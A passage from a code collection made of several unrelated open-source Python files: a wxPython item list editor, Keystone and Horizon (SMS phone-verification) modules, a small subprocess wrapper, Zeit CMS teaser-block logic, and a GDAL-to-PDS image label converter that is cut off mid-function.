#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>
import wx
from .common import ListCtrl
from .events import PostEditItemEvent, PostEditQtyEvent
from wx.lib.mixins import listctrl as listmix
class TextEditMixin(listmix.TextEditMixin):
    """listmix.TextEditMixin with per-column edit gating.
    Item columns (all headers except the first and the last) and the qty
    column (the last header) can be enabled or disabled independently.
    """
    def __init__(self):
        # Columns 1 .. len(headers)-2 hold item fields; the last is qty.
        self.__item_columns = set(range(1,len(self.headers)-1))
        self.__qty_editing_enabled = False
        self.__item_editing_enabled = False
        listmix.TextEditMixin.__init__(self)
        self.Bind(wx.EVT_LIST_BEGIN_LABEL_EDIT, self.__OnLabelEditBegin)
        self.Bind(wx.EVT_LIST_END_LABEL_EDIT, self.__OnLabelEditEnd)
    def __is_enabled(self, col):
        # Editing permission depends on whether *col* is an item or qty column.
        if col in self.__item_columns:
            return self.__item_editing_enabled
        else:
            return self.__qty_editing_enabled
    def __OnLabelEditBegin(self, evt):
        # Veto edits on columns whose editing is currently disabled.
        if self.__is_enabled(evt.m_col):
            return evt.Skip()
        else:
            return evt.Veto()
    def __OnLabelEditEnd(self, evt):
        if not self.__is_enabled(evt.m_col):
            evt.Veto()
            return
        # Dispatch to the matching hook before the edit is committed.
        if evt.m_col in self.__item_columns:
            self.OnItemEdit(evt.m_itemIndex, evt.m_col, evt.m_item.GetText())
        else:
            self.OnQtyEdit(evt.m_itemIndex, evt.m_col, evt.m_item.GetText())
        evt.Skip()
    def OnItemEdit(self, row, col, txt):
        """Hook: called after an item column was edited.  Default: no-op."""
        pass
    def OnQtyEdit(self, row, col, txt):
        """Hook: called after the qty column was edited.  Default: no-op."""
        pass
    def EnableItemEditing(self, enable):
        """Enable or disable in-place editing of the item columns."""
        self.__item_editing_enabled = enable
        if not enable and self.curCol in self.__item_columns:
            #Close the editor if it is shown
            self.CloseEditor()
    def EnableQtyEditing(self, enable):
        """Enable or disable in-place editing of the qty column."""
        self.__qty_editing_enabled = enable
        if not enable and self.curCol not in self.__item_columns:
            self.CloseEditor()
class ItemViewer(ListCtrl, TextEditMixin):
    """Virtual-mode list control displaying items with in-place editing."""

    def __init__(self, parent, **kargs):
        self.items = []
        # (column label, initial width) pairs; TextEditMixin reads this too.
        self.headers = [('Id',50),('Name',50),('Category',100),('Price',75),('Qty',50)]
        # Item attribute shown in each column, indexed by column number.
        self.attrs = ['id','name','category','price','qty']
        kargs['style'] = wx.LC_REPORT|wx.LC_VIRTUAL|kargs.get('style',0)
        ListCtrl.__init__(self, parent, **kargs)
        TextEditMixin.__init__(self)
        for col, (label, width) in enumerate(self.headers):
            self.InsertColumn(col, label)
            self.SetColumnWidth(col, width)
        self.setResizeColumn(2)
        self.SetItemCount(0)

    def GetItemAt(self, index):
        """Return the backing item displayed at row *index*."""
        return self.items[index]

    def UpdateDisplay(self, items):
        """Replace the displayed data with *items* (a query-like collection)."""
        total = items.count()
        self.SetItemCount(total)
        # Materialize so SetVirtualData() can mutate entries in place.
        self.items = list(items)
        self.RefreshItems(0, total - 1)

    def OnGetItemText(self, row, col):
        """wx virtual-mode callback: text for cell (row, col)."""
        return getattr(self.items[row], self.attrs[col])

    def SetVirtualData(self, row, col, text):
        """Write an edited cell value back to the item and post an event."""
        item = self.items[row]
        if col == 3:        # price column holds floats
            value = float(text)
        elif col == 4:      # qty column holds ints
            value = int(text)
        else:
            value = text
        setattr(item, self.attrs[col], value)
        if col == 4:
            PostEditQtyEvent(self, item.id, item.qty)
        else:
            PostEditItemEvent(self, item)
| miheerdew/SalesMan | salesman/lib/gui/ItemViewer.py | Python | gpl-3.0 | 3,806 |
# Keystone API version metadata advertised by the service.
VERSION_STATUS = "ALPHA"
VERSION_DATE = "2011-04-23T00:00:00Z"
from keystone.logic.service import IdentityService
# Shared singleton identity service used by the frontends.
SERVICE = IdentityService()
# These just need to be imported somewhere, nothing appears to access them?
# NOTE(review): importing keystone.backends.sqlalchemy presumably registers
# the backend as an import side effect -- confirm before removing.
from keystone.backends import sqlalchemy
SQLALCHEMY = sqlalchemy
| ntt-pf-lab/backup_keystone | keystone/config.py | Python | apache-2.0 | 285 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
__author__ = "Vivek Dhayaal"
__copyright__ = "Copyright 2014, Reliance Jio Infocomm Ltd."
from horizon import forms
from horizon import messages
from django import shortcuts
from horizon_jiocloud.api import keystoneapi
from horizon_jiocloud.utils.utils import generate_and_send_sms
from horizon_jiocloud.change_phone import forms as phone_forms
import logging
LOG = logging.getLogger(__name__)
class PhoneView(forms.ModalFormView):
    """Modal settings view for changing the account phone number."""

    form_class = phone_forms.PhoneForm
    template_name = 'change_phone/change.html'

    def get_initial(self):
        """Seed the form with the phone number pending verification.

        The new number is parked in request.session: after the OTP has
        been sent by SMS it cannot be stored in the database until the
        user confirms it, yet it still has to be shown in the form.
        """
        defaults = super(PhoneView, self).get_initial()
        defaults["phone"] = self.request.session.get("phone")
        return defaults
def sendSms(request):
    """(Re-)send the phone-verification OTP via SMS.

    Serves re-sending the SMS multiple times until the OTP expires, to
    cater for SMS delivery failures.  Always redirects back to the phone
    settings page.
    """
    phone = request.session.get("phone")
    user = None
    try:
        res = keystoneapi.get_user(request.user.id)
        # Same acceptance condition as before: proceed when the API call
        # signals success or returned a result payload.
        if res.get("success") or res.get("result"):
            user = res.get("result")
    except Exception as ex:
        LOG.exception(ex)
    if not user:
        # BUGFIX: the original fell through after logging, then dereferenced
        # an unbound `res` (NameError) or a None `user` (AttributeError).
        # Tell the user and bail out gracefully instead.
        messages.error(request, 'Unable to send SMS. Please try again.')
        return shortcuts.redirect('horizon:settings:phone:index')
    sms_activation_code = user.get("sms_activation_code")
    try:
        generate_and_send_sms(phone, sms_activation_code)
        messages.success(request,
                'SMS sent successfully')
    except Exception as ex:
        # Best effort: log the delivery failure; user can retry from the page.
        LOG.exception(ex)
    return shortcuts.redirect('horizon:settings:phone:index')
| JioCloud/horizon | horizon_jiocloud/change_phone/views.py | Python | apache-2.0 | 1,800 |
import subprocess
import sys

# Run the external "lomb" program on A.txt and stream its combined
# stdout/stderr to our stdout line by line.
# BUGFIX: without universal_newlines the pipe yields bytes under Python 3,
# so print() emitted b'...' reprs; writing the decoded line verbatim also
# avoids the extra blank line print() appended after each output line.
proc = subprocess.Popen(["./lomb", "A.txt"], stdout=subprocess.PIPE,
                        stderr=subprocess.STDOUT, universal_newlines=True)
for line in proc.stdout:
    sys.stdout.write(line)
proc.wait()
| sonicyang/TIE | tools/sub.py | Python | gpl-2.0 | 172 |
from zeit.cms.i18n import MessageFactory as _
import copy
import grokcore.component as grok
import lxml.objectify
import zeit.cms.content.property
import zeit.cms.interfaces
import zeit.cms.syndication.feed
import zeit.cms.syndication.interfaces
import zeit.content.cp.blocks.block
import zeit.content.cp.interfaces
import zeit.edit.interfaces
import zope.component
import zope.container.interfaces
import zope.interface
import zope.schema
class TeaserBlock(
    zeit.content.cp.blocks.block.Block,
    zeit.cms.syndication.feed.ContentList):
    """Centerpage block holding an ordered list of teasered content.

    Combines the generic CP block behaviour with the syndication
    ContentList; the teaser entries are stored directly inside this
    block's XML node (see `entries`).  The XML 'module' attribute holds
    the id of the teaser layout.
    """
    zope.interface.implementsOnly(
        zeit.content.cp.interfaces.ITeaserBlock,
        zeit.cms.syndication.interfaces.IFeed,
        zope.container.interfaces.IContained)
    # Block type identifier; newly created blocks carry 'teaser' in their
    # XML 'module' attribute until a concrete layout id replaces it.
    type = 'teaser'
    force_mobile_image = zeit.cms.content.property.ObjectPathAttributeProperty(
        '.', 'force_mobile_image', zeit.content.cp.interfaces.ITeaserBlock[
            'force_mobile_image'])
    def __init__(self, context, xml):
        """Initialize from XML, resolving a placeholder layout if present."""
        super(TeaserBlock, self).__init__(context, xml)
        if self.xml.get('module') == 'teaser':
            # 'teaser' is the placeholder for "no layout chosen yet": resolve
            # the effective default and write it back via the layout setter.
            if isinstance(self.layout, zeit.content.cp.layout.NoBlockLayout):
                raise ValueError(_(
                    'No default teaser layout defined for this area.'))
            # Not a no-op: the getter computes the effective layout, the
            # setter persists its id into the 'module' XML attribute.
            self.layout = self.layout
        assert self.xml.get('module') != 'teaser'
    @property
    def entries(self):
        # overriden so that super.insert() and updateOrder() work
        # (ContentList expects the node that holds the teaser children).
        return self.xml
    @property
    def layout(self):
        """Resolve the layout from XML, falling back to the area default."""
        id = self.xml.get('module')
        source = zeit.content.cp.interfaces.ITeaserBlock['layout'].source(
            self)
        layout = source.find(id)
        if layout:
            return layout
        # Unknown/missing layout id: use the area's default, or a marker
        # object signalling that no layout is available at all.
        return zeit.content.cp.interfaces.IArea(self).default_teaser_layout \
            or zeit.content.cp.layout.NoBlockLayout(self)
    @layout.setter
    def layout(self, layout):
        # Mark the persistent object changed and store the layout id in XML.
        self._p_changed = True
        self.xml.set('module', layout.id)
    # ITeaserBlock schema field names to copy in update(), minus the plain
    # XML-representation fields (iterating an interface yields its names).
    TEASERBLOCK_FIELDS = (
        set(zope.schema.getFieldNames(
            zeit.content.cp.interfaces.ITeaserBlock)) -
        set(zeit.cms.content.interfaces.IXMLRepresentation)
    )
    def update(self, other):
        """Copy teaser contents and schema fields from *other* onto self.

        Raises ValueError when *other* is not an ITeaserBlock.
        """
        if not zeit.content.cp.interfaces.ITeaserBlock.providedBy(other):
            raise ValueError('%r is not an ITeaserBlock' % other)
        # Copy teaser contents.
        for content in other:
            self.append(content)
        # Copy block properties (including __name__ and __parent__)
        for name in self.TEASERBLOCK_FIELDS:
            setattr(self, name, getattr(other, name))
class Factory(zeit.content.cp.blocks.block.BlockFactory):
    # Block factory registered for TeaserBlock; `title` is the label
    # presented in the CP editor's module library.
    produces = TeaserBlock
    title = _('List of teasers')
@grok.adapter(zeit.content.cp.interfaces.IArea,
              zeit.cms.interfaces.ICMSContent,
              int)
@grok.implementer(zeit.edit.interfaces.IElement)
def make_block_from_content(container, content, position):
    """Create a teaser block at *position* seeded with *content*."""
    teaser_block = Factory(container)(position)
    teaser_block.insert(0, content)
    return teaser_block
@grok.adapter(zeit.content.cp.interfaces.ITeaserBlock)
@grok.implementer(zeit.edit.interfaces.IElementReferences)
def cms_content_iter(context):
    """Yield every content object referenced by the teaser block."""
    for referenced in context:
        yield referenced
@grok.adapter(zeit.content.cp.interfaces.ICenterPage)
@grok.implementer(zeit.content.cp.interfaces.ITeaseredContent)
def extract_teasers_from_cp(context):
    """Yield teasered content of every area of the centerpage, in order."""
    for region in context.values():
        for area in region.values():
            for content in zeit.content.cp.interfaces.ITeaseredContent(area):
                yield content
@grok.adapter(zeit.content.cp.interfaces.IArea)
@grok.implementer(zeit.content.cp.interfaces.ITeaseredContent)
def extract_teasers_from_area(context):
    """Yield the contents of each teaser block inside the area."""
    for block in context.filter_values(
            zeit.content.cp.interfaces.ITeaserBlock):
        # list() snapshots the block so iteration is safe while yielding.
        for content in list(block):
            yield content
def extract_manual_teasers(context):
    """Yield the contents of the teaser blocks among context's values."""
    for block in context.values():
        if zeit.content.cp.interfaces.ITeaserBlock.providedBy(block):
            # Snapshot the block before yielding its contents.
            for content in list(block):
                yield content
@grok.subscribe(
    zeit.content.cp.interfaces.ITeaserBlock,
    zope.container.interfaces.IObjectMovedEvent)
def change_layout_if_not_allowed_in_new_area(context, event):
    """Persist the effective layout after a block is moved between areas."""
    # Getting a default layout can mean that the current layout is not allowed
    # in this area (can happen when a block was moved between areas). Thus, we
    # want to change the XML to actually reflect the new default layout.
    if context.layout.is_default(context):
        # Not a no-op: the layout getter computes the effective default and
        # the setter writes its id into the XML 'module' attribute.
        context.layout = context.layout
@grok.subscribe(
    zeit.content.cp.interfaces.ITeaserBlock,
    zope.container.interfaces.IObjectAddedEvent)
def apply_layout_for_added(context, event):
    """Assign the first/default teaser layout to a freshly added block."""
    parent = context.__parent__
    if not parent.apply_teaser_layouts_automatically:
        return
    # XXX The overflow_blocks handler also reacts to IObjectAddedEvent and
    # may already have removed this block from the container.  Items fetched
    # via getitem are recreated from XML, so in that case the object handed
    # to us is stale (`context is not parent[context.__name__]`) and changes
    # made here would be lost.  Guard against that and do nothing -- the new
    # container is responsible for the layout then.  (Touching __parent__
    # instead would be asking for trouble.)
    names = parent.keys()
    if context.__name__ not in names:
        return
    if names.index(context.__name__) == 0:
        context.layout = parent.first_teaser_layout
    else:
        context.layout = parent.default_teaser_layout
@grok.subscribe(
    zeit.content.cp.interfaces.IArea,
    zeit.edit.interfaces.IOrderUpdatedEvent)
def set_layout_to_default_when_moved_down_from_first_position(area, event):
    """Demote the formerly-first teaser block to the default layout.

    When reordering pushes the block that used to be first further down,
    it must lose the special first-position layout again.
    """
    if not area.apply_teaser_layouts_automatically:
        return
    # XXX The overflow_blocks handler listens to the IObjectAddedEvent and may
    # have removed this item from the container. In that case we have to do
    # nothing, since checking the layout is handled by the new container.
    if event.old_order[0] not in area.keys():
        return
    previously_first = area[event.old_order[0]]
    # BUGFIX (readability): the original applied `> 0` to the whole
    # `providedBy(...) and index(...)` expression; it only behaved correctly
    # because `False > 0` happens to be False.  State the intent explicitly.
    if (zeit.content.cp.interfaces.ITeaserBlock.providedBy(previously_first)
            and area.values().index(previously_first) > 0):
        previously_first.layout = area.default_teaser_layout
@grok.adapter(zeit.content.cp.interfaces.ITeaserBlock)
@grok.implementer(zeit.content.cp.interfaces.IRenderedXML)
def rendered_xml_teaserblock(context):
    """Build the rendered XML node for a teaser block."""
    node_factory = getattr(lxml.objectify.E, context.xml.tag)
    rendered = node_factory(**context.xml.attrib)
    # Copy non-content children (like topiclinks) verbatim.  'block' children
    # are re-rendered from the content below; xinclude is legacy (BBB: not
    # generated anymore, but some might still exist) and is dropped.
    skipped = ('block', '{http://www.w3.org/2003/XInclude}include')
    for child in context.xml.getchildren():
        if child.tag not in skipped:
            rendered.append(copy.copy(child))
    # Render each referenced content object via its "content" adapter.
    for entry in context:
        content_node = zope.component.queryAdapter(
            entry, zeit.content.cp.interfaces.IRenderedXML, name="content")
        if content_node is not None:
            rendered.append(content_node)
    return rendered
@grok.adapter(zeit.cms.interfaces.ICMSContent, name="content")
@grok.implementer(zeit.content.cp.interfaces.IRenderedXML)
def rendered_xml_cmscontent(context):
    """Render a CMS content object as a <block> reference node.

    Returns None for content without a uniqueId.
    """
    unique_id = context.uniqueId
    if not unique_id:
        return None
    node = lxml.objectify.E.block(uniqueId=unique_id, href=unique_id)
    updater = zeit.cms.content.interfaces.IXMLReferenceUpdater(context)
    updater.update(node, suppress_errors=True)
    return node
| ZeitOnline/zeit.content.cp | src/zeit/content/cp/blocks/teaser.py | Python | bsd-3-clause | 7,905 |
#!/usr/bin/env python
#/******************************************************************************
# * $Id$
# *
# * Project: GDAL Utilities
# * Purpose: Create a PDS compatible (raw w PDS label) from a GDAL supported image.
# * Currently only LMMP projections supported (geographic,
# * equirectangular, polar_stereographic)
# * Author: Trent Hare, <thare at usgs dot gov>
# * Date: July 20, 2011
# * version: 0.1
# *
# * Port from gdalinfo.py whose author is Even Rouault
# *
# ******************************************************************************
# * Copyright (c) 2010, Even Rouault
# * Copyright (c) 1998, Frank Warmerdam
# *
# * Permission is hereby granted, free of charge, to any person obtaining a
# * copy of this software and associated documentation files (the "Software"),
# * to deal in the Software without restriction, including without limitation
# * the rights to use, copy, modify, merge, publish, distribute, sublicense,
# * and/or sell copies of the Software, and to permit persons to whom the
# * Software is furnished to do so, subject to the following conditions:
# *
# * The above copyright notice and this permission notice shall be included
# * in all copies or substantial portions of the Software.
# *
# * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# * DEALINGS IN THE SOFTWARE.
# ****************************************************************************/
import sys
import math
from time import strftime
try:
from osgeo import gdal
from osgeo import osr
except:
import gdal
import osr
#/************************************************************************/
#/* Usage() */
#/************************************************************************/
def Usage(theApp):
    """Print command-line usage and terminate with exit status 1.

    *theApp* (the program name) is accepted for symmetry with the C
    utilities but is not interpolated into the message.
    """
    usage_lines = (
        '\nUsage: LMMP_gdal2PDS in.tif output.img',
        ' optional: to print out image information also send -debug',
        'Usage: LMMP_gdal2PDS -debug in.tif output.img\n',
        'Note: Currently this routine only supports LMMP products in',
        ' (geographic, equirectangular, polar_stereographic)\n',
    )
    for text in usage_lines:
        print(text)
    sys.exit(1)
def EQUAL(a, b):
    """Return True when strings *a* and *b* match, ignoring case."""
    lowered_a = a.lower()
    lowered_b = b.lower()
    return lowered_a == lowered_b
#/************************************************************************/
#/* main() */
#/************************************************************************/
def main( argv = None ):
bComputeMinMax = False
bSample = False
bShowGCPs = True
bShowMetadata = False
bShowRAT=False
debug = False
bStats = False
bApproxStats = True
bShowColorTable = True
bComputeChecksum = False
bReportHistograms = False
pszFilename = None
papszExtraMDDomains = [ ]
pszProjection = None
hTransform = None
bShowFileList = True
dst_img = None
dst_lbl = None
bands = 1
centLat = None
centLon = None
#/* Must process GDAL_SKIP before GDALAllRegister(), but we can't call */
#/* GDALGeneralCmdLineProcessor before it needs the drivers to be registered */
#/* for the --format or --formats options */
#for( i = 1; i < argc; i++ )
#{
# if EQUAL(argv[i],"--config") and i + 2 < argc and EQUAL(argv[i + 1], "GDAL_SKIP"):
# {
# CPLSetConfigOption( argv[i+1], argv[i+2] );
#
# i += 2;
# }
#}
#
#GDALAllRegister();
if argv is None:
argv = sys.argv
argv = gdal.GeneralCmdLineProcessor( argv )
if argv is None:
return 1
nArgc = len(argv)
#/* -------------------------------------------------------------------- */
#/* Parse arguments. */
#/* -------------------------------------------------------------------- */
i = 1
while i < nArgc:
if EQUAL(argv[i], "--utility_version"):
print("%s is running against GDAL %s" %
(argv[0], gdal.VersionInfo("RELEASE_NAME")))
return 0
elif EQUAL(argv[i], "-debug"):
debug = True
elif EQUAL(argv[i], "-mm"):
bComputeMinMax = True
elif EQUAL(argv[i], "-hist"):
bReportHistograms = True
elif EQUAL(argv[i], "-stats"):
bStats = True
bApproxStats = False
elif EQUAL(argv[i], "-approx_stats"):
bStats = True
bApproxStats = True
elif EQUAL(argv[i], "-sample"):
bSample = True
elif EQUAL(argv[i], "-checksum"):
bComputeChecksum = True
elif EQUAL(argv[i], "-nogcp"):
bShowGCPs = False
elif EQUAL(argv[i], "-nomd"):
bShowMetadata = False
elif EQUAL(argv[i], "-norat"):
bShowRAT = False
elif EQUAL(argv[i], "-noct"):
bShowColorTable = False
elif EQUAL(argv[i], "-mdd") and i < nArgc-1:
i = i + 1
papszExtraMDDomains.append( argv[i] )
elif EQUAL(argv[i], "-nofl"):
bShowFileList = False
elif argv[i][0] == '-':
return Usage(argv[0])
elif pszFilename is None:
pszFilename = argv[i]
elif dst_img is None:
dst_img = argv[i]
else:
return Usage(argv[0])
i = i + 1
if pszFilename is None:
return Usage(argv[0])
if dst_img is None:
return Usage(argv[0])
#/* -------------------------------------------------------------------- */
#/* Open dataset. */
#/* -------------------------------------------------------------------- */
hDataset = gdal.Open( pszFilename, gdal.GA_ReadOnly )
if hDataset is None:
print("gdalinfo failed - unable to open '%s'." % pszFilename )
sys.exit(1)
# Open the output file.
if dst_img is not None:
dst_lbl = dst_img.replace("IMG","LBL")
dst_lbl = dst_lbl.replace("img","lbl")
if (EQUAL(dst_lbl,dst_img)):
print('Extension must be .IMG or .img - unable to run using filename: %s' % pszFilename )
sys.exit(1)
else:
f = open(dst_lbl,'wt')
# else:
# f = sys.stdout
# dst_img = "out.img"
#/* -------------------------------------------------------------------- */
#/* Report general info. */
#/* -------------------------------------------------------------------- */
hDriver = hDataset.GetDriver();
if debug:
print( "Driver: %s/%s" % ( \
hDriver.ShortName, \
hDriver.LongName ))
papszFileList = hDataset.GetFileList();
if papszFileList is None or len(papszFileList) == 0:
print( "Files: none associated" )
else:
if debug:
print( "Files: %s" % papszFileList[0] )
if bShowFileList:
for i in range(1, len(papszFileList)):
print( " %s" % papszFileList[i] )
if debug:
print( "Size is %d, %d" % (hDataset.RasterXSize, hDataset.RasterYSize))
#/* -------------------------------------------------------------------- */
#/* Report projection. */
#/* -------------------------------------------------------------------- */
pszProjection = hDataset.GetProjectionRef()
if pszProjection is not None:
hSRS = osr.SpatialReference()
if hSRS.ImportFromWkt(pszProjection ) == gdal.CE_None:
pszPrettyWkt = hSRS.ExportToPrettyWkt(False)
#print( "Coordinate System is:\n%s" % pszPrettyWkt )
mapProjection = "None"
#Extract projection information
target = hSRS.GetAttrValue("DATUM",0).replace("D_","").replace("_2000","")
semiMajor = hSRS.GetSemiMajor() / 1000.0
semiMinor = hSRS.GetSemiMinor() / 1000.0
if (pszProjection[0:6] == "GEOGCS"):
mapProjection = "SIMPLE_CYLINDRICAL"
centLat = 0
centLon = 0
if (pszProjection[0:6] == "PROJCS"):
mapProjection = hSRS.GetAttrValue("PROJECTION",0)
if EQUAL(mapProjection,"Equirectangular"):
centLat = hSRS.GetProjParm('standard_parallel_1')
centLon = hSRS.GetProjParm('central_meridian')
if EQUAL(mapProjection,"Polar_Stereographic"):
centLat = hSRS.GetProjParm('latitude_of_origin')
centLon = hSRS.GetProjParm('central_meridian')
if EQUAL(mapProjection,"Stereographic_South_Pole"):
centLat = hSRS.GetProjParm('latitude_of_origin')
centLon = hSRS.GetProjParm('central_meridian')
if EQUAL(mapProjection,"Stereographic_North_Pole"):
centLat = hSRS.GetProjParm('latitude_of_origin')
centLon = hSRS.GetProjParm('central_meridian')
if debug:
print( "Coordinate System is:\n%s" % pszPrettyWkt )
else:
print( "Warning - Can't parse this type of projection\n" )
print( "Coordinate System is `%s'" % pszProjection )
sys.exit(1)
else:
print( "Warning - No Coordinate System defined:\n" )
sys.exit(1)
#/* -------------------------------------------------------------------- */
#/* Report Geotransform. */
#/* -------------------------------------------------------------------- */
adfGeoTransform = hDataset.GetGeoTransform(can_return_null = True)
if adfGeoTransform is not None:
if adfGeoTransform[2] == 0.0 and adfGeoTransform[4] == 0.0:
if debug:
print( "Origin = (%.15f,%.15f)" % ( \
adfGeoTransform[0], adfGeoTransform[3] ))
print( "Pixel Size = (%.15f,%.15f)" % ( \
adfGeoTransform[1], adfGeoTransform[5] ))
else:
if debug:
print( "GeoTransform =\n" \
" %.16g, %.16g, %.16g\n" \
" %.16g, %.16g, %.16g" % ( \
adfGeoTransform[0], \
adfGeoTransform[1], \
adfGeoTransform[2], \
adfGeoTransform[3], \
adfGeoTransform[4], \
adfGeoTransform[5] ))
if (pszProjection[0:6] == "GEOGCS"):
#convert degrees/pixel to km/pixel
mapres = 1 / adfGeoTransform[1]
kmres = adfGeoTransform[1] * (semiMajor * math.pi / 180.0)
else:
#convert m/pixel to pixel/degree
mapres = 1 / (adfGeoTransform[1] / (semiMajor * 1000.0 * math.pi / 180.0))
kmres = adfGeoTransform[1] / 1000.0
#/* -------------------------------------------------------------------- */
#/* Report GCPs. */
#/* -------------------------------------------------------------------- */
if bShowGCPs and hDataset.GetGCPCount() > 0:
pszProjection = hDataset.GetGCPProjection()
if pszProjection is not None:
hSRS = osr.SpatialReference()
if hSRS.ImportFromWkt(pszProjection ) == gdal.CE_None:
pszPrettyWkt = hSRS.ExportToPrettyWkt(False)
if debug:
print( "GCP Projection = \n%s" % pszPrettyWkt )
else:
if debug:
print( "GCP Projection = %s" % \
pszProjection )
gcps = hDataset.GetGCPs()
i = 0
for gcp in gcps:
if debug:
print( "GCP[%3d]: Id=%s, Info=%s\n" \
" (%.15g,%.15g) -> (%.15g,%.15g,%.15g)" % ( \
i, gcp.Id, gcp.Info, \
gcp.GCPPixel, gcp.GCPLine, \
gcp.GCPX, gcp.GCPY, gcp.GCPZ ))
i = i + 1
#/* -------------------------------------------------------------------- */
#/* Report metadata. */
#/* -------------------------------------------------------------------- */
if debug:
if bShowMetadata:
papszMetadata = hDataset.GetMetadata_List()
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( "Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
if bShowMetadata:
for extra_domain in papszExtraMDDomains:
papszMetadata = hDataset.GetMetadata_List(extra_domain)
if papszMetadata is not None and len(papszMetadata) > 0 :
print( "Metadata (%s):" % extra_domain)
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Report "IMAGE_STRUCTURE" metadata. */
#/* -------------------------------------------------------------------- */
if bShowMetadata:
papszMetadata = hDataset.GetMetadata_List("IMAGE_STRUCTURE")
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( "Image Structure Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Report subdatasets. */
#/* -------------------------------------------------------------------- */
papszMetadata = hDataset.GetMetadata_List("SUBDATASETS")
if papszMetadata is not None and len(papszMetadata) > 0 :
print( "Subdatasets:" )
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Report geolocation. */
#/* -------------------------------------------------------------------- */
if bShowMetadata:
papszMetadata = hDataset.GetMetadata_List("GEOLOCATION")
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( "Geolocation:" )
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Report RPCs */
#/* -------------------------------------------------------------------- */
if bShowMetadata:
papszMetadata = hDataset.GetMetadata_List("RPC")
else:
papszMetadata = None
if bShowMetadata and papszMetadata is not None and len(papszMetadata) > 0 :
print( "RPC Metadata:" )
for metadata in papszMetadata:
print( " %s" % metadata )
#/* -------------------------------------------------------------------- */
#/* Setup projected to lat/long transform if appropriate. */
#/* -------------------------------------------------------------------- */
if pszProjection is not None and len(pszProjection) > 0:
hProj = osr.SpatialReference( pszProjection )
if hProj is not None:
hLatLong = hProj.CloneGeogCS()
if hLatLong is not None:
gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
hTransform = osr.CoordinateTransformation( hProj, hLatLong )
gdal.PopErrorHandler()
if gdal.GetLastErrorMsg().find( 'Unable to load PROJ.4 library' ) != -1:
hTransform = None
#/* -------------------------------------------------------------------- */
#/* Report corners. */
#/* -------------------------------------------------------------------- */
if debug:
print( "Corner Coordinates:" )
GDALInfoReportCorner( hDataset, hTransform, "Upper Left", \
0.0, 0.0 );
GDALInfoReportCorner( hDataset, hTransform, "Lower Left", \
0.0, hDataset.RasterYSize);
GDALInfoReportCorner( hDataset, hTransform, "Upper Right", \
hDataset.RasterXSize, 0.0 );
GDALInfoReportCorner( hDataset, hTransform, "Lower Right", \
hDataset.RasterXSize, \
hDataset.RasterYSize );
GDALInfoReportCorner( hDataset, hTransform, "Center", \
hDataset.RasterXSize/2.0, \
hDataset.RasterYSize/2.0 );
#Get bounds
ulx = GDALGetLon( hDataset, hTransform, 0.0, 0.0 );
uly = GDALGetLat( hDataset, hTransform, 0.0, 0.0 );
lrx = GDALGetLon( hDataset, hTransform, hDataset.RasterXSize, \
hDataset.RasterYSize );
lry = GDALGetLat( hDataset, hTransform, hDataset.RasterXSize, \
hDataset.RasterYSize );
#/* ==================================================================== */
#/* Loop over bands. */
#/* ==================================================================== */
if debug:
bands = hDataset.RasterCount
for iBand in range(hDataset.RasterCount):
hBand = hDataset.GetRasterBand(iBand+1 )
#if( bSample )
#{
# float afSample[10000];
# int nCount;
#
# nCount = GDALGetRandomRasterSample( hBand, 10000, afSample );
# print( "Got %d samples.\n", nCount );
#}
(nBlockXSize, nBlockYSize) = hBand.GetBlockSize()
print( "Band %d Block=%dx%d Type=%s, ColorInterp=%s" % ( iBand+1, \
nBlockXSize, nBlockYSize, \
gdal.GetDataTypeName(hBand.DataType), \
gdal.GetColorInterpretationName( \
hBand.GetRasterColorInterpretation()) ))
if hBand.GetDescription() is not None \
and len(hBand.GetDescription()) > 0 :
print( " Description = %s" % hBand.GetDescription() )
dfMin = hBand.GetMinimum()
dfMax = hBand.GetMaximum()
if dfMin is not None or dfMax is not None or bComputeMinMax:
line = " "
if dfMin is not None:
line = line + ("Min=%.3f " % dfMin)
if dfMax is not None:
line = line + ("Max=%.3f " % dfMax)
if bComputeMinMax:
gdal.ErrorReset()
adfCMinMax = hBand.ComputeRasterMinMax(False)
if gdal.GetLastErrorType() == gdal.CE_None:
line = line + ( " Computed Min/Max=%.3f,%.3f" % ( \
adfCMinMax[0], adfCMinMax[1] ))
print( line )
stats = hBand.GetStatistics( bApproxStats, bStats)
# Dirty hack to recognize if stats are valid. If invalid, the returned
# stddev is negative
if stats[3] >= 0.0:
print( " Minimum=%.3f, Maximum=%.3f, Mean=%.3f, StdDev=%.3f" % ( \
stats[0], stats[1], stats[2], stats[3] ))
if bReportHistograms:
hist = hBand.GetDefaultHistogram(force = True, callback = gdal.TermProgress)
if hist is not None:
dfMin = hist[0]
dfMax = hist[1]
nBucketCount = hist[2]
panHistogram = hist[3]
print( " %d buckets from %g to %g:" % ( \
nBucketCount, dfMin, dfMax ))
line = ' '
for bucket in panHistogram:
line = line + ("%d " % bucket)
print(line)
if bComputeChecksum:
print( " Checksum=%d" % hBand.Checksum())
dfNoData = hBand.GetNoDataValue()
if dfNoData is not None:
if dfNoData != dfNoData:
print( " NoData Value=nan" )
